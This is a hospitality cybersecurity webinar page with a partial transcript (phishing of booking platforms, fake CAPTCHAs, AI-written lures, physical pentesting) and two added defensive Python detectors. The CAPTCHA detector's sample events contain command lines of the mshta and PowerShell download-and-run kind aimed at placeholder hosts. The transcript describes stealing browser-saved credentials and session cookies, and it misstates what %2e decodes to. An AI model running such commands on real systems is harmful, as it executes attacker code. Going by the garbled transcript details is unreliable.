Hospitality Security Webinar - 2025 Q1
Estimated read time: 1:20
Summary
This hospitality security webinar delved into the specific challenges and threats facing the industry, highlighting how hospitality is one of the most frequently targeted sectors by cyber attacks. The session detailed various incidents, including phishing attempts on booking platforms and innovative tactics used by attackers. Physical vulnerabilities in hotels and the importance of staff training in recognizing social engineering were also discussed. The key message was the necessity for robust cybersecurity measures tailored to the hospitality sector's unique environment.
Highlights
- The hospitality sector is a major target for cyber attacks, with methods constantly evolving. 🚨
- Cyber threats include phishing campaigns impersonating Booking.com and Revanate, fake CAPTCHAs, and AI-generated phishing emails. 🦠
- Physical penetration testing reveals common vulnerabilities such as unsecured entry points and social engineering risks. 🕵️♂️
- Training and awareness among hotel staff are critical to recognize and respond to threats effectively. 📚
- Implementing multi-factor authentication and maintaining secure log management can mitigate data breaches. 🔏
- Continual updates and assessments in cybersecurity practices are vital for staying ahead of threats. 🔄
Key Takeaways
- Hospitality faces high cyber threat levels due to its open and welcoming environment. 🏨
- Phishing attempts often mimic legitimate booking platforms, making detection challenging. 📧
- In-house developed CRMs without multi-factor authentication can lead to data breaches. 🔐
- Fake CAPTCHAs trick users into executing malicious scripts, showcasing evolving attack strategies. 🤖
- Physical security at hotels can be bolstered with training and awareness to prevent unauthorized access. 🔍
- Regular penetration testing is crucial for identifying and mitigating vulnerabilities. 🔑
Overview
The hospitality industry is uniquely vulnerable to cyber attacks due to its inherently open and inviting nature. This webinar highlights how fraudulent schemes often mimic legitimate platforms like Booking.com, making it challenging to tell genuine from malicious activity. The session also discussed how weak cybersecurity practices, such as not enforcing multi-factor authentication, can lead to breaches, drawing particular attention to incidents involving platforms like Revanate.
On the physical security side, the webinar's second part emphasized common vulnerabilities found in hotels, including unsecured entry points and the prevalence of social engineering attacks. It showcased how attackers often exploit human error to gain access to sensitive information, underscoring the need for heightened awareness among staff. By simulating real-world attack scenarios, the webinar demonstrated potential breaches, encouraging a proactive approach to tightening security measures.
The importance of regular reviews and updates to security measures was a recurrent theme throughout the presentation. The combination of technical defenses like multi-factor authentication, secure log management, and comprehensive staff training was emphasized as an essential strategy for fortifying against both cyber and physical threats. The speakers advocated a proactive, informed approach to security that accommodates the particular challenges and dynamics of the hospitality sector.
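The vendor-impersonation emails the webinar describes rely on the receiving mail system never validating SPF and DKIM. The following gateway-side check is an added example, not code from the webinar or the vendors it names: it reads the Authentication-Results header stamped by your own gateway and flags any message whose From: domain is a trusted vendor but whose SPF, DKIM or DMARC result is not "pass". The authserv-id, vendor domains and messages are constructed placeholders.

```python
"""Flag mail claiming to come from a trusted vendor whose SPF/DKIM/DMARC did not pass."""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed placeholders: the authserv-id your gateway writes, and vendor domains you trust.
AUTHSERV_ID = "mx.hotel.example"
TRUSTED_SENDER_DOMAINS = {"vendor.example", "booking.example"}


def parse_authentication_results(header_value: str) -> dict[str, str]:
    """Return {method: result} from an Authentication-Results header (RFC 8601 shape).

    Only headers stamped by our own gateway are trusted: a sender can inject a forged
    Authentication-Results header upstream, so a foreign authserv-id yields nothing.
    """
    normalized = " ".join(header_value.split())            # undo header folding
    parts = [p.strip() for p in normalized.split(";") if p.strip()]
    if not parts or parts[0].split()[0].lower() != AUTHSERV_ID:
        return {}
    results: dict[str, str] = {}
    for part in parts[1:]:                                  # e.g. "spf=fail smtp.mailfrom=..."
        match = re.match(r"([a-z]+)=([a-z]+)", part, re.IGNORECASE)
        if match:
            results[match.group(1).lower()] = match.group(2).lower()
    return results


def check_message(raw: str) -> tuple[bool, list[str]]:
    """Return (suspicious, reasons) for a raw RFC 5322 message."""
    msg = message_from_string(raw)
    _, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rpartition("@")[2].lower()
    if from_domain not in TRUSTED_SENDER_DOMAINS:
        return False, []                                    # not claiming to be a vendor
    auth: dict[str, str] = {}
    for value in msg.get_all("Authentication-Results", []):
        auth.update(parse_authentication_results(value))
    reasons = [f"{m}={auth.get(m, 'missing')}"
               for m in ("spf", "dkim", "dmarc") if auth.get(m) != "pass"]
    return bool(reasons), reasons


# Constructed sample messages (no real addresses or indicators).
SPOOFED_VENDOR_MAIL = (
    "From: Vendor Support <noreply@vendor.example>\n"
    "To: reservations@hotel.example\n"
    "Subject: Action required: your account will be suspended\n"
    "Authentication-Results: mx.hotel.example;\n"
    " spf=fail smtp.mailfrom=vendor.example;\n"
    " dkim=none;\n"
    " dmarc=fail header.from=vendor.example\n"
    "\n"
    "Log in now to avoid disruption of your service.\n"
)

GENUINE_VENDOR_MAIL = (
    "From: Vendor Support <noreply@vendor.example>\n"
    "To: reservations@hotel.example\n"
    "Subject: Your monthly statement\n"
    "Authentication-Results: mx.hotel.example;\n"
    " spf=pass smtp.mailfrom=vendor.example;\n"
    " dkim=pass header.d=vendor.example;\n"
    " dmarc=pass header.from=vendor.example\n"
    "\n"
    "Your statement is attached.\n"
)

# A sender-injected "pass" header carrying a foreign authserv-id must not be trusted.
INJECTED_HEADER_MAIL = (
    "From: Vendor Support <noreply@vendor.example>\n"
    "To: reservations@hotel.example\n"
    "Subject: Verify your account\n"
    "Authentication-Results: attacker.example; spf=pass; dkim=pass; dmarc=pass\n"
    "\n"
    "Please verify your account.\n"
)

if __name__ == "__main__":
    for name, raw in [("spoofed", SPOOFED_VENDOR_MAIL), ("genuine", GENUINE_VENDOR_MAIL),
                      ("injected", INJECTED_HEADER_MAIL)]:
        print(name, check_message(raw))
```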
Chapters
- 00:00 - 03:00: Introduction The introduction chapter of a hospitality security webinar focuses on the increasing threats faced by the hospitality industry. The webinar aims to provide actionable intelligence to hospitality customers and industry stakeholders through a new series of webinars. The speaker emphasizes the need for heightened security awareness in hospitality due to it being a highly targeted industry.
- 03:00 - 11:00: Revanate Phishing Attack The chapter titled 'Revanate Phishing Attack' discusses the surprising focus of phishing attacks on the hospitality industry, which is one of the highest and first targeted sectors, even above critical national infrastructure. The chapter aims to provide insights into the trends observed in Q1 of the current year to better equip companies in protecting themselves.
- 11:00 - 18:00: Fake CAPTCHA Attack The chapter titled 'Fake CAPTCHA Attack' includes a segment from a webinar. During this chapter, Kurt, a member of the team, discusses the physical security testing being conducted in the hospitality sector. He presents interesting findings from their security assessments. The session starts with a brief introduction about Fredbike, a company co-founded by the speaker.
- 18:00 - 23:00: AI-Generated Phishing Emails The chapter discusses the widespread growth and expansion into various industries, leading to better insights into security threats. The global customer base has allowed for the observation and understanding of international patterns and cultural differences in security threats. This includes detecting the emergence and transformation of phishing activities.
- 23:00 - 33:00: Booking.com Phishing Attacks The chapter discusses the ongoing issue of Booking.com phishing attacks, highlighting that while the problem has been persistent for several years, there are new and interesting developments observed in the most recent quarter.
- 33:00 - 35:00: Fake Ads and Malvertising The chapter titled 'Fake Ads and Malvertising' discusses novel trends observed in online threats, particularly focusing on recent developments in malvertising. The narrative begins with a key event involving Revanate, a major player in the hospitality industry's direct booking platforms. In an incident reminiscent of past cyber threats experienced by companies like Booking.com, Revanate fell victim to a wave of phishing emails aimed at compromising their services. The chapter highlights the significance of this event as it marks a new occurrence in the cybersecurity landscape.
- 35:00 - 41:00: Living Off the Land Attacks This chapter discusses 'Living Off the Land' (LotL) attacks, focusing on how attackers impersonate legitimate sources like Revanate. Attackers send emails from what appears to be Revanate's own email address to bypass email protection systems that might not be checking protocols like SPF and DKIM. Additionally, similar attack emails are sent from other addresses with the aim of deceiving recipients who may not scrutinize the email details.
- 41:00 - 47:00: Physical Penetration Testing Introduction The chapter discusses physical penetration testing by drawing parallels to cyber security threats, such as phishing attacks. It describes a scenario where users receive emails instructing them to log into their accounts to address potential issues, often under threat of service disruption or cancellation. Upon clicking the links, users are directed to a phishing page that captures their login credentials, which are then exploited by attackers. This analogy highlights how penetration tests aim to identify vulnerabilities through simulated attacks.
- 47:00 - 71:00: Common Findings in Physical Security This chapter discusses common issues identified in physical security, specifically focusing on inappropriate access and data extraction activities within a Customer Relationship Management (CRM) system. It describes a scenario where users logged into the Revanate CRM and accessed various functionalities to extract guest information. The lack of native export functionality led users to manually browse through and capture data by taking screenshots, highlighting a significant security risk due to poor access management and data protection practices.
- 71:00 - 75:00: Social Engineering The chapter discusses a case where attackers manipulated HTML formats to download sensitive guest information onto local machines. Despite having access to the data, they only started targeting victims in January of this year by sending phishing emails. These emails requested additional payments for bookings, either before the guest had initially paid or as a secondary payment, highlighting a methodical social engineering attack.
- 75:00 - 80:00: Improving Security Measures The chapter titled 'Improving Security Measures' discusses a series of phishing attacks targeting customers, who began receiving suspicious messages via email. Some customers promptly recognized the threat and reported back to the hotels. It was discovered that attackers had been collecting this information for months. The security team's response, as stated by Revanate in January, involved informing customers who had reported these phishing attempts.
- 80:00 - 95:30: Conclusion and Q&A In the Conclusion and Q&A chapter, it was revealed that a security breach occurred due to the absence of multi-factor authentication (MFA) on accounts around August to November 2024. This vulnerability allowed attackers to successfully execute a simple phishing attack by capturing usernames and passwords, which were sufficient to access the platform. Despite the time elapsed since then, this oversight was a critical factor in the security lapse.
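The fake-CAPTCHA chain the webinar walks through ends with a command pasted into the Windows Run dialog, so the telemetry signature is a script interpreter started by explorer.exe with a remote URL and decoy text such as "I am not a robot" on its command line. The scorer below is an added example, not code from the webinar or any vendor; it runs over constructed process-creation events of the kind an EDR or SIEM would receive, and the hostnames and paths are placeholders.

```python
"""Score process-creation events for the fake-CAPTCHA "paste into Win+R" execution chain."""
import re
from dataclasses import dataclass

# Interpreters the webinar says to block; pwsh.exe is added as the modern PowerShell binary name.
SCRIPT_INTERPRETERS = {"mshta.exe", "powershell.exe", "pwsh.exe"}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
CAPTCHA_DECOY = re.compile(r"not a robot|captcha|verif", re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    image: str           # full path of the created process
    parent_image: str    # full path of its parent
    command_line: str


def basename_of(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons); processes that are not script interpreters score 0."""
    if basename_of(event.image) not in SCRIPT_INTERPRETERS:
        return 0, []
    reasons = ["script interpreter started"]
    # A command typed into the Run dialog is spawned by the shell, so explorer.exe is the parent.
    if basename_of(event.parent_image) == "explorer.exe":
        reasons.append("launched from explorer.exe (Run dialog or shell)")
    if REMOTE_URL.search(event.command_line):
        reasons.append("remote URL passed to interpreter")
    if CAPTCHA_DECOY.search(event.command_line):
        reasons.append("CAPTCHA-style decoy text in command line")
    return len(reasons), reasons


def detect(events, threshold: int = 3) -> list[tuple[ProcessEvent, list[str]]]:
    """Return events scoring at or above the threshold, with the reasons that fired."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((event, reasons))
    return hits


# Constructed sample telemetry (placeholder hostnames and paths, not real indicators).
SAMPLE_EVENTS = [
    ProcessEvent(  # the chain from the webinar: mshta, remote URL, decoy text, from explorer
        r"C:\Windows\System32\mshta.exe",
        r"C:\Windows\explorer.exe",
        'mshta https://placeholder-lure.example/verify.hta # "I am not a robot - Verification ID: 7624"',
    ),
    ProcessEvent(  # routine admin script from a console: scores 1
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"C:\Windows\System32\cmd.exe",
        r"powershell.exe -File C:\scripts\nightly-backup.ps1",
    ),
    ProcessEvent(  # local HTA opened by a user: scores 2, below threshold
        r"C:\Windows\System32\mshta.exe",
        r"C:\Windows\explorer.exe",
        r'mshta.exe "C:\Program Files\Vendor\installer.hta"',
    ),
    ProcessEvent(  # PowerShell from the shell fetching remote content: scores 3 without decoy text
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"C:\Windows\explorer.exe",
        'powershell -c "Invoke-WebRequest https://placeholder-stage.example/update"',
    ),
]

if __name__ == "__main__":
    for event, reasons in detect(SAMPLE_EVENTS):
        print(basename_of(event.image), "->", "; ".join(reasons))
```

Treat a score of 3 or more as an alert to investigate and a score of 2 as a baselining candidate; blocking the interpreters and disabling the Run dialog, as the webinar recommends, removes the chain altogether.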
Hospitality Security Webinar - 2025 Q1 Transcription
- 00:00 - 00:30 Hello and welcome to our hospitality security webinar. This is the very first webinar that we've been doing this year. We've started a new series of these because what we want to be able to do is deliver actionable intelligence to our hospitality customers and other people within the industry, because what we're seeing is that hospitality is one of the most targeted industries that are around today. So a lot of people
- 00:30 - 01:00 would think that a lot of attacks are against things like critical national infrastructure. And whilst they are, we actually see that one of the highest targeted and one of the first targeted industries is actually hospitality. And so what we wanted to do is walk through some of the things that we've been seeing in quarter 1 of this year so that you have the information that you need to protect your companies. So over this session I'm going to be stepping through some of the things that we've been seeing, and
- 01:00 - 01:30 then we're very lucky to also have, on the second part of today's webinar, one of the people from our team, Kurt. He's going to be walking you through some of the physical security testing that we've been carrying out as well within hospitality and showing you some of the interesting findings that we've been making. So let's kick off. Very quick introduction for those who don't know, but Fredbike is a company which I co-founded actually, and
- 01:30 - 02:00 essentially we've grown very extensively over the last few years across the globe. We now cover a very large number of different industries. We see a lot of different active security threats and we're able to see patterns of activity emerging, where we can see where it first starts and then what it turns into. And so having a global customer base has really helped us to understand the cultural differences
- 02:00 - 02:30 between different regions and the different approaches that people have had to cyber security. And so I'm going to take you through now the things that we have seen this quarter. So if we kick off now, some of the things that we've actually seen are things which would have been appearing in previous years. So we're going to talk about some of the Booking.com phishing which has also been happening for the last couple of years. But we've actually seen some really interesting
- 02:30 - 03:00 stuff where this is the very first time that we've seen it through all the time that we've been monitoring. So if we start off with one of the key things that happened at the beginning of this year, it was actually around Revanate. So Revanate, as I'm sure most of you will know, is one of the largest direct booking platform vendors that exist in the hospitality industry. And what happened to them is that, like Booking.com, there was a whole series of different phishing emails that were sent out to Revanate
- 03:00 - 03:30 customers pretending to actually be Revanate. And I've got a couple of examples of that here. So what we can see is that the emails are either coming from Revanate's own email address, hoping that people's email protection systems will fail and just let those emails through, not checking for things like SPF and DKIM. But also, we saw the same type of emails being sent from other email addresses, obviously hoping that the person receiving these emails won't actually look very closely
- 03:30 - 04:00 at where they're coming from. But in all cases, these emails were directing the user to log onto their Revanate account in order to deal with a potential problem, typically threatening them that their service was about to be either disrupted or cancelled. And so when they would actually click through on these links, the page that they would land on, very much again like the Booking.com phishing attacks, would capture their username and password. And the attackers would use that username and password to
- 04:00 - 04:30 log in to the Revanate CRM as that customer. And then what we found that they did when they were logging in is they were going into different parts of the functionality within the Revanate platform, such as, for example here, we can see the guest information. Revanate, I don't think, actually provides much in the way of native export functionality, so what they actually did is they stepped through pages and pages of guest information, taking screenshots, potentially saving it
- 04:30 - 05:00 in HTML format to their local machine. But they were actually capturing all the sensitive information about guests. Interestingly, they didn't actually target those guests until this year. And so what happened this year is, all of a sudden in January, guests started receiving these phishing emails where they were being asked to pay for their booking. So an additional kind of payment step, either before they'd made payment or actually as a secondary payment. And so the guests
- 05:00 - 05:30 started receiving these messages on their emails, and a number of them actually realized at the time that this didn't look quite right and started reporting it back to the hotels. And so what was particularly interesting is that the attackers had actually kept this information for months. And so when digging into this, Revanate's actual response to this, and this is in January, is that they then told customers, in response to them reporting these phishing attacks,
- 05:30 - 06:00 that actually the breach had happened around about November. I think it was in a time range between potentially August to November in 2024, when Revanate didn't enforce multi-factor authentication on accounts. And so because there was no multi-factor authentication, a simple username and password phish was more than sufficient to capture the credentials and log in to the platform. And so unfortunately, because time had moved on so much at this point, and despite
- 06:00 - 06:30 Revanate actually being so compliant, they only held on to 30 days of access logs. So it was actually impossible to prove which account was compromised, when it was compromised, or what it was used for. And so the whole thing was a bit of a serious data privacy issue, where it was impossible to actually do that kind of triage and root cause analysis step. And so people just blindly have to take this information from Revanate that this is the way that
- 06:30 - 07:00 this attack happened and that their systems themselves weren't compromised. But there was literally no evidence to that fact. So some of the key lessons, and I think it's important to pull this out, not just go through the problems here but actually highlight what kind of lessons we could learn from this. And some of the key ones are that we should be looking to integrate these kinds of web applications, be it Booking.com, be it Revanate, into single sign-on. And unfortunately they don't always make that available as an option, and so more
- 07:00 - 07:30 pressure on them to perform and allow these kinds of integrations would seriously reduce the potential risk here. Where obviously multi-factor is available, it should always be used. So Revanate did have the option of actually using multi-factor, but a lot of people chose not to use it. And finally, where possible, you should also be looking to capture the logs, the audit logs essentially, within these platforms, pull them into your own SIEM log management
- 07:30 - 08:00 system and actually analyze that activity and look for suspicious logins, just like you would if it was, say, Office 365 or Microsoft Azure. Okay, so moving on to the next threat that we've seen this year. And this is something that again we saw actually targeting hospitality first before it then moved out into other industries: fake CAPTCHAs. So what is a fake CAPTCHA? Now this was quite interesting. So here we can see on the page, in this example, that there's
- 08:00 - 08:30 a website again purporting to be Booking.com, the partner hub. But clearly from the URL you can see that it's not Booking.com. Now, interestingly, people started to receive these links as they were before for fake Booking.com websites. But now, rather than asking people for their username and password, what they were instead asked to do is to prove that they weren't a robot. And so the method for doing that was essentially to press the Windows button and R,
- 08:30 - 09:00 as you can see in the instructions here, then Control and V and press Enter. And so what actually happened here is that the browser, in JavaScript, allows you to actually copy things onto the clipboard. So what the web page did is it copied a malicious script onto the clipboard and then convinced the user at the machine to actually open up the Windows Run dialog, paste it in and press Enter. And so here we can see the full sequence to this.
- 09:00 - 09:30 So the user initially receives an email, and here we can see the typical kind of thing: I would like to extend my stay. I've stumbled upon a review. Here's the URL. They're guiding the person who's receiving this email through the process of going to that website. So they go to that website. They actually hit the Cloudflare CAPTCHA, which is legitimate, and a lot of the time they actually use that CAPTCHA in order to evade automatic security scraping solutions. So if the security tool
- 09:30 - 10:00 goes off and it tries to open this URL itself and take a screenshot and run it through some sort of analysis, unfortunately all it will see is the Cloudflare CAPTCHA. So first they prove that you actually are a human, and so you go through that stage, and then you get to this fake CAPTCHA. And this fake CAPTCHA, you have to click on it, it looks like a real CAPTCHA, and it comes up with these additional verification steps. The user follows the instructions and then actually pastes this information directly into the Windows Run dialog.
- 10:00 - 10:30 And so here we can see mshta, which is one of the Windows script interpreters. It provides a URL where to pull the script from, and it actually has a little bit of extra text at the end which says 'I am not a robot' to make it look a little bit more legitimate. And so here we can actually see an alert that's been flagged up when this has happened. So the executable code has been copied from that window. It's been pasted into Windows Run. It's been executed. We can see MSHTA here running, reaching out, downloading
- 10:30 - 11:00 additional content from the internet and executing it. So this has now really taken off as an approach. So we're seeing this approach not only applied to emails but also when you go to search engines and you click through some of the results; sometimes, if those websites have been compromised, they'll be doing the exact same thing. And I have to say it's been very effective in convincing a number of different users to go ahead and try to execute this. So it's really, really important that you're hardening your
- 11:00 - 11:30 endpoints against these types of attacks. So again, coming to our lessons learned, we need to be looking at blocking script interpreters, so things like MSHTA, PowerShell. We need to be disabling the Run dialog for users where possible. I mean, why do they need to use it? It's an advanced feature. And always we should be looking at running EDR on the endpoints to actually detect these types of attacks and block them as they get executed. Now a particularly interesting
- 11:30 - 12:00 one that we spotted this quarter as well is fully AI-generated phishing emails. So last year we started to see partially AI-generated emails. Now we're seeing the full thing. So here there's a few examples of where the hotels are receiving emails which purportedly come from a guest of the hotel. They go off and they talk about how the food was not nice or the stay was not good or there was a review or something which they
- 12:00 - 12:30 weren't particularly happy with. And then in the middle of this it drops in a URL, and again that URL takes them off and sends them to a phishing site. But what was particularly interesting about this is, I mean, you can see the depth that the person has gone to when they've written this email, except it's not a person. There are actually tools on the internet like ZeroGPT where you can run text through and it will tell you if it's been generated by AI or not. And so here we can see that all of
- 12:30 - 13:00 this text is AI-generated. And so this creates an amazing ability for attackers to craft any sort of phishing email they want and insert all kinds of nuances and randomness into the text in order to bypass the mail filters. Now here is another example of this. You can see it's formatted slightly differently. It's quite interesting, I think, this example, because again it doesn't really read very well. When you look at the text, it kind of mixes up
- 13:00 - 13:30 the customer and the hotel. So they start saying, for example, that they've seen feedback, and then they want to talk about why the feedback was left on them, which apparently was on a website. So it's all a little bit confused, and again they guide the person who's receiving this email off to another website to review this review which has supposedly been found. But again, fully AI-generated, and in these cases there is absolutely nothing in terms of
- 13:30 - 14:00 copyright information. There's no information here where mail filters can look at it and say, look, you know, this is a fake Booking.com website. This is just purportedly a person, a guest, who's complaining about their stay. And so moving on to the next one: Booking.com phishing, which has obviously been incredibly popular for the last couple of years. We have seen this take a step up recently. So looking at some of the examples, some of the examples are a
- 14:00 - 14:30 lot more sophisticated than others. So this is an example from recently where again they're talking about the guest experience; that's been a very common one recently, talking about, you know, the complaint that has been left. And I think the complaint part of this, you can see there's a commonality: it really triggers people into actually opening up these links. And so here they're saying that a complaint has been left from a guest, click 'see details' to get more information, and then it takes you off again to a fake Booking.com
- 14:30 - 15:00 website. Now, an interesting twist on this, and I don't think we've seen this a lot recently, is where actually there's an email with very, very little information in there, talking about how there's a system update. It has very little information in the actual email itself, but it has an attachment. And weirdly, in the attachment there's actually a copy of the email as you would expect to see in, say, Outlook, but as a PDF. So again you
- 15:00 - 15:30 can see these new adaptations of this attack, and they're kind of trying and trying and trying to bypass all the different rules that people have put in place to try to detect these types of attacks and stop them. Now this one I actually found probably the most interesting. So there are some companies who have been struggling a lot with Booking.com phishing. I mean, you know, obviously a lot of companies have had these problems, but some companies have actually really, really struggled with this even after
- 15:30 - 16:00 locking down their Booking.com profiles. So they'll have all the controls in place. They'll have the multi-factor in place, and guests will still be receiving these phishing messages, which are actually coming through the Booking.com application or through the Booking.com site. So it looks entirely legitimate from where it's coming from. But obviously you can see in these messages that they're not legitimate. So they are trying to extort
- 16:00 - 16:30 further money from guests. Now, after conducting the forensics in these cases, there were no malicious logins on the Booking.com accounts. No settings had been changed. And so it really begged the question: how was this possible, that guests were receiving messages through the Booking.com application, which looked incredibly legitimate, and they were legitimate, they were really coming through Booking.com, if the Booking.com account had not been compromised? And so this one was quite the challenge to
- 16:30 - 17:00 work out. But having conducted the incident response in this case, what we actually noticed was that the customer themselves had a completely separate and, interestingly, in-house developed CRM in which they were tracking all of the user information. So here on the right-hand side in this screenshot you can actually see a screenshot of this information which
- 17:00 - 17:30 they were capturing, and I'd just draw your attention to this bit here which says guest.booking.com. This is actually an email address. Okay. And so everybody who creates a booking on Booking.com gets assigned their own specific email address, which the hotel can then use, and they can email that email address. And when they do email that email address, it actually comes out as a message inside the Booking.com application. So it wasn't
- 17:30 - 18:00 Booking.com itself that had been compromised. It wasn't even the login details of Booking.com that had been compromised. It was actually the CRM. And again, no multi-factor authentication on that CRM. So clearly at some point an account, maybe through credential stuffing, maybe some other sort of phishing attack that had happened, but ultimately somebody had gained access to the CRM. They were able to siphon off these unique email addresses and they were then able to directly send
- 18:00 - 18:30 messages to those people who were staying with them. And so you can actually see this as well in these screenshots. You can see that the Booking.com account hasn't actually been compromised, because there is link protection that's been enabled within this account. So it prevents people from actually putting links into the messages. And so they're actually having to split up the links in order to bypass that protection. They're basically telling the guest, copy both
- 18:30 - 19:00 parts, put them together, put it into the browser, and, you know, obviously it's more work, so it's less likely that people are going to do it. And so the obvious solution here would be for the attacker to turn off the link protection, but they can't because they don't have access to the Booking.com account. So a really, really interesting case to actually work through, that one. Now we've also seen recently that adverts have been used to essentially
- 19:00 - 19:30 capture guests of different hotels as well before they get to the official website of those hotels. So what will happen is that a guest will search for a particular hotel on one of the search engines. They will then obviously scroll down, but before they get to the legitimate website for the hotel they'll come across the adverts, and what the attackers are actually starting to do is they're starting to take out adverts
- 19:30 - 20:00 which then direct the people to a fake website. Okay. So initially what we found actually is that these websites are really just scams in a way. So what they're doing is they're trying to uplift the price and essentially add on additional cost for the guest so that they get paid as part of this process. So there's a lot of negative reviews, obviously, about this kind of practice here. But it's very interesting because this
- 20:00 - 20:30 practice could easily be applied to phishing or even malware in the future. So there's been a lot of different cases where malicious adverts have been taken out and driven people to click on them and then to actually be taken to malware-related websites where they might download something, and again it could be a phishing page; they could type in their username and password. But it's interesting to see that the attackers are actually willing to pay for this access. They will actually pay money to the search engine providers to put these
- 20:30 - 21:00 malicious links above the legitimate links of the websites of the hotels that they're targeting. In this case, I think one of the key lessons here is that it's important to just regularly check search engines, right? So put the names of the hotels into search engines and look at that guest journey. What does it look like? Is there anything there that shouldn't be? Just to again identify any potential fraudsters who are out there, or in, you know, future cases it might be
- 21:00 - 21:30 fishing that's being conducted. Um alternatively there are reputation protection services that you can sign up to who will do all this kind of work for you um and then send you alerts should this type of thing happen. Um another interesting one that occurred I'm just moving on to the last couple of examples here before Kurt takes over. And so on the last couple of examples, if we go through um this one is again quite interesting uh because
- 21:30 - 22:00 what's happened here is that a user has received an email and if we look at it, it says uh this is a essentially a fake voice message that the user has received. And this email says clink click the link below to the voice message except you can't click it, right? There is actually no link here. It says having trouble listening to this. Copy and paste this link into your browser. And so here we can see looker studio and then we can see this percentage 2e uh percentage 67. And so
- 22:00 - 22:30 what this is is actually called URL encoding. So this is ways of encoding characters in a URL. And actually percentage 2e actually is a forward slash. And so Outlook in this case doesn't recognize this as a valid URL. So neither will email protection solutions potentially. They'll look at this and they'll think it's just text. And but interestingly, when you take this text and you copy it across to the browser, you can see the top example here where it's been copied across. You paste that in, press enter, it
- 22:30 - 23:00 automatically decodes that URL and then takes you to the Lucer Studio site. And within Lucer Studio, it's just another one of these sites where it's be used as staging. So essentially one drive um dropbox lucer studio these are very common sites for where there'll be staging where they will take you to it. It's a very legitimate website but on it it will have some content which then drives you off to another website which is a lot less legitimate. Um, and recently, we touched
- 23:00 - 23:30 on this actually last year a little bit in some of the conferences that we were attending, but there's been a very significant uplift in what was called living off the land attacks. This is where, rather than installing malware onto a machine, what's happening is that staff at hotels are being coerced into downloading remote control software. And so, this could be something like TeamViewer, it could be AnyDesk. There's lots and lots of different tools that essentially could be used, but they get a telephone call.
- 23:30 - 24:00 Somebody pretending to be IT or something like this asks them to download this application. The EDR doesn't flag it. The antivirus doesn't flag it because these are legitimate applications. But the problem is that once that application is installed, the attacker can come back to that system anytime they want. And when they do come back to it, they'll then be presented with everything that that user has access to, which could be PMS software. And so they might try to then exfiltrate the data out of that PMS
- 24:00 - 24:30 software, which obviously then turns into a data breach. One recent case that we saw was very interesting because rather than actually looking at the PMS directly on the machine, what they actually attempted to do was to extract the credentials that were stored in the browser. So you might find that users are storing usernames and passwords using the native functionality of the browser. The problem with this is that it's incredibly insecure. And so what can
- 24:30 - 25:00 happen is that an attacker can gain access to the machine. He can open up the developer tools in the browser. He sees that the username and password's cached. He simply clicks sign in. And then he can actually capture the username and password that's being submitted to that site. And now he has the login details. He can take them out of that session. He can go and put them into his own machine. And then he can log on. And you might be thinking that multifactor is a solution to this. But unfortunately, if multifactor is actually applied, then what they can do is they can copy the session cookies
- 25:00 - 25:30 out. Those session cookies can be inserted into a different browser and it gives them full access to whatever the user's logged in as. And so, a few of the lessons that we can learn from this is that we should be blocking remote access tools where they're not required. We should be again monitoring the logs from things like Opera for suspicious activity. Making sure that we know where activity is coming from, what users are doing, where they're logging in from, and making sure that we're looking for suspicious activity, patterns of
- 25:30 - 26:00 activity which might indicate that an attacker has access to those accounts. And also it's generally good practice as well to prevent users from storing passwords in their browsers as well as files or any of the 10 million places where users decide to store these things. All right. So actually rather than taking questions now, what I'm going to do is I'm going to hand over to Kurt from our team, and Kurt is going to now take us through some of the
- 26:00 - 26:30 physical penetration testing that we do for some of our customers and show you some of the common findings that come out of that. Adam, just making sure you can hear me before I start whizzing through all of the points I've got. Okay, it looks like I am on audio.
- 26:30 - 27:00 Perfect. Right, so let's get to it. I'm just going to bring my screen over. Okay. So, what we'll cover here is a quick understanding of what physical penetration testing is. We'll go through some of the most common vulnerabilities that we find at hotels and I'll talk about social engineering and how to prepare your staff to recognize these types of attacks. We'll also go over how to improve your hotel
- 27:00 - 27:30 security. And if we have time at the end, I'll talk about some real world examples of attacks we've carried out at Threat Spike. So, who am I? I'm Kurt Hems. I've been a pentester for about two years and I work at Threat Spike as one of the lead physical penetration testers. I simulate real world attacks all over the world and help hotels and other organizations remediate their vulnerabilities. So we meticulously
- 27:30 - 28:00 craft attacks to replicate threat actors in order to demonstrate how they would exfiltrate data from your organization. Now, Adam's touched on this, but we're covering, I think, more than 80 countries now and we've helped secure our clients for nearly 15 years. And as Adam mentioned, we offer endpoint security and detection as well as red teaming simulations to help protect organizations, and black teaming is part of the array of services
- 28:00 - 28:30 that we offer. Now black teaming, or physical penetration testing, is essentially simulating real world attacks to identify your weaknesses before malicious actors do. So most people think of cyber security as protecting a network or a web application. However, so many people forget the importance of the physical attack surface present on site, actually at premises. And hotels are no different
- 28:30 - 29:00 to other organizations, as there's an importance to protect data to ensure the safety of your clients, as physical security makes up part of the kill chain. So in the image here you can see some of the penetration testing kit we use on engagements, which consists of many different tools that are used by threat actors all over the globe. So we are literally creating the same scenarios as real life threat actors. So we'll jump straight into the
- 29:00 - 29:30 most common findings we have on a typical black team engagement. And I'll cover these off to give examples of how we exploit these vulnerabilities when carrying out specific attack vectors. As cyber security is open source in this industry, findings are usually better to be shared, so organizations can increase their defenses. A lot of these attacks have never actually been disclosed before, and we're giving you a lot of insight into how to better secure
- 29:30 - 30:00 your hotel. I've obviously left out a lot of critical findings that we usually find, just for the purpose of non-disclosures, but from past hotel engagements, I'm showing you how to rectify some of these vulnerabilities with immediate effect. So, without further ado, let's jump into the first one. So, we've got unsecured entry points, and they are usually the biggest
- 30:00 - 30:30 downfall to allowing attacks to escalate. By failing to lock doors, our team is usually able to access sensitive files that can be used to escalate our attacks into accounts and systems. And I'll touch more on that in a little bit, as to what that can lead to. Whilst rooms are usually locked, we often find that human error plays a massive part in this attack vector. And once the door's left unsecured, our team go to work on finding data in drawers, accessing machines, reviewing transactional data,
